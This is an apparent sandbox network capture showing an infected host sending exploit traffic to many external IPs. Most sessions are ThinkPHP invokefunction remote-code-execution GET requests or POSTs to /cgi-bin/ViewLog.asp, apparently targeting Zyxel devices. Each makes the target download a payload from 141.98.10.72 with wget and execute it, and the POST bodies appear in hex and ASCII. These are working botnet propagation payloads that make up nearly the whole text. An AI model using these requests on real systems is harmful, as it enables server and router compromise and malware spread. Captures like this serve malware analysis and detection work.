                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1060192.168.2.233746095.154.17.16680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:21.782372952 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1061192.168.2.233874695.110.197.20780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:21.793447018 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:22.011338949 CET461INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:21 GMT
                                                            Server: Apache
                                                            Content-Length: 283
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 64 65 66 61 75 6c 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at default Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1062192.168.2.234024688.34.159.7480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:21.995208979 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:22.208005905 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:22 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1063192.168.2.234829495.58.240.21680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:22.075385094 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:22.385258913 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:30:22.385313988 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1064192.168.2.235920231.136.144.658080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:22.173760891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:22.799385071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.047192097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:26.611407042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:31.726130962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:41.708901882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:02.441937923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1065192.168.2.235969062.29.78.1808080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:22.219141960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1066192.168.2.234876894.123.90.2248080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:22.219208956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1067192.168.2.233283095.131.76.1488080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:22.228769064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:22.486557007 CET324INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.14.0
                                                            Date: Wed, 14 Feb 2024 08:30:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1068192.168.2.235447888.135.44.10480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:22.257781029 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1069192.168.2.234676494.120.48.1218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:22.317117929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1070192.168.2.234556895.196.221.9980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:22.604094028 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:22.833995104 CET62INHTTP/1.0 400 Bad Request
                                                            Connection: Keep-Alive
                                                            Feb 14, 2024 09:30:22.841798067 CET83INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                            Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1071192.168.2.233549695.101.176.16480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.035001040 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:23.235873938 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:23 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:23 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 32 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 33 26 23 34 36 3b 32 36 65 30 62 31 33 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c27a7b5c&#46;1707899423&#46;26e0b131</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1072192.168.2.234037695.97.176.1480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.049688101 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:23.271950960 CET487INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:30:20 GMT
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1073192.168.2.234745895.217.73.3680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.052468061 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:23.270553112 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.15.8
                                                            Date: Wed, 14 Feb 2024 08:30:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.15.8</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1074192.168.2.234617031.136.105.1888080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.804739952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.431334019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.678960085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
